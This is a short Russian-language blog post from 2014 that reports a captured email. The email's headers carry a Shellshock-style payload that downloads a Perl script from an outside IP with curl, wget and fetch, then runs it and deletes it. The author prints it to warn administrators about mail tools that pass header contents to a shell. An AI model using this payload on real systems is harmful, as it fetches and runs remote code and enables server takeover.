October 24th, 2014

gul

Любопытная попытка получить shell

Пришло такое письмо:

Received: from u16850951.onlinehome-server.com [74.208.184.251]
        by happy.kiev.ua with smtp (Exim 4.80.1)
        id 1XhihW-0005vz-Lr
        for root@localhost; Fri, 24 Oct 2014 20:30:59 +0300
To: {: ;, };, /bin/sh-c'/bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&'&;
References: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Cc: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
Bcc: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
From: {: ;, };, /bin/sh-c'cd/tmp;, curl-sO178.254.31.165/ex.txt;,
        lwp-download http:  //178.254.31.165/ex.txt;,
        wget178.254.31.165/ex.txt;, fetch178.254.31.165/ex.txt;, perlex.txt
        ;, rm-frex.*'&;
Subject: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Date: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Message-ID: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Comments: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Keywords: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-Date: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
Resent-From: () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget
        178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;


Задумайтесь и вы, не передаётся ли какому-нибудь почтовому транспорту (спамфильтру, автоответчику, процмейлу, логгеру и пр) параметром что-нибудь из тела письма. А если передаётся, безопасно ли это происходит.

Желающие могут скачать и изучить перловый скрипт самостоятельно.